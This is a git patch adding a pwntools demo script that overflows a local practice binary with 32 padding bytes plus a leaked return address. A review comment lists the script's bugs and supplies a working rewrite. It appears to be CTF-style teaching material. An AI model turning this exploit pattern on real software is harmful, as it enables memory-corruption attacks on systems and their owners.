From aa5844585ac8e1dfea65ef579c6aa53971b4eca8 Mon Sep 17 00:00:00 2001
From: Dan Goldsmith
Date: Sun, 22 Nov 2020 12:57:02 +0000
Subject: [PATCH] Demo of using Pwntools updated

---
 pwnDemo.py | 44 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 pwnDemo.py

diff --git a/pwnDemo.py b/pwnDemo.py
new file mode 100644
index 0000000..53c11ec
--- /dev/null
+++ b/pwnDemo.py
@@ -0,0 +1,44 @@
+from pwn import *
+
+context(os='linux', arch='amd64')
+context.log_level = 'debug'
+
+import logging
+logging.basicConfig(level=logging.DEBUG)
+log = logging.getLogger("PWN")
+
+log.info("Startng process...")
+#And do the Input / output
+p = process("./garbage") #Change this to the File
+
+p = process.recv_until(">") #Should get up the the Yes No Prompt
+log.debug(p)
+
+#Reply Yess
+process.writeline("y")
+
+#Get the next lot
+p = process.recv_until("..")
+log.debug(p)
+
+#And the "Data"
+addresses = process.recvuntil('"')
+log.info("---- You need to Process this part ---")
+log.info(addressess)
+
+#Split on space
+parts = addresses.split(" ")
+#Remove brackets
+ADDRESS = parts[0].strip("[").strip("]").strip() #Brackets and whitespace
+
+#And get ready to send the response
+p = process.recv_until(">")
+log.debug(p)
+
+#Build the payload
+OFFSET = 32
+payload = "A"*32
+payload += p64(ADDRESS)
+
+#And Send it
+#p.sendline(payload)
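Review bot: The tube handle is lost on the line `p = process.recv_until(">")` — the variable that held the spawned process is overwritten with received data, and every I/O call is made on the `process` class instead of the `p` instance, so the final `p.sendline(payload)` could never reach the target; the pwntools method names are also `recvuntil`/`sendline`, not `recv_until`/`writeline`. `log.info(addressess)` is a typo for `addresses` (NameError), and `p64(ADDRESS)` receives the stripped string rather than an integer, so the parsed leak needs `int(ADDRESS, 16)` (assuming the token is a hex literal — confirm against the binary's output); on Python 3 the tube returns `bytes`, so the `split`/`strip` calls must operate on bytes or on a `.decode()`d copy. `OFFSET = 32` is defined but `"A"*32` hard-codes the same value, and the `str` payload cannot be concatenated with the `bytes` that `p64` returns — build it as `b"A" * OFFSET + p64(address)`. The rewrite below keeps the tube in `p`, parses the leaked value before packing it, and logs the parsed address so a wrong parse is visible before the payload is sent.

```python
p = process("./garbage")  # change this to the target binary

p.recvuntil(b">")         # up to the yes/no prompt
p.sendline(b"y")
p.recvuntil(b"..")

# leaked token, e.g. '[0x...] ...' — strip brackets/whitespace and parse as hex
leak = p.recvuntil(b'"').decode()
log.info("---- You need to Process this part ---")
log.info(leak)
address = int(leak.split(" ")[0].strip("[] "), 16)
log.info("parsed address: %#x", address)

p.recvuntil(b">")

# … unchanged: payload comment …
OFFSET = 32
payload = b"A" * OFFSET + p64(address)

# p.sendline(payload)
```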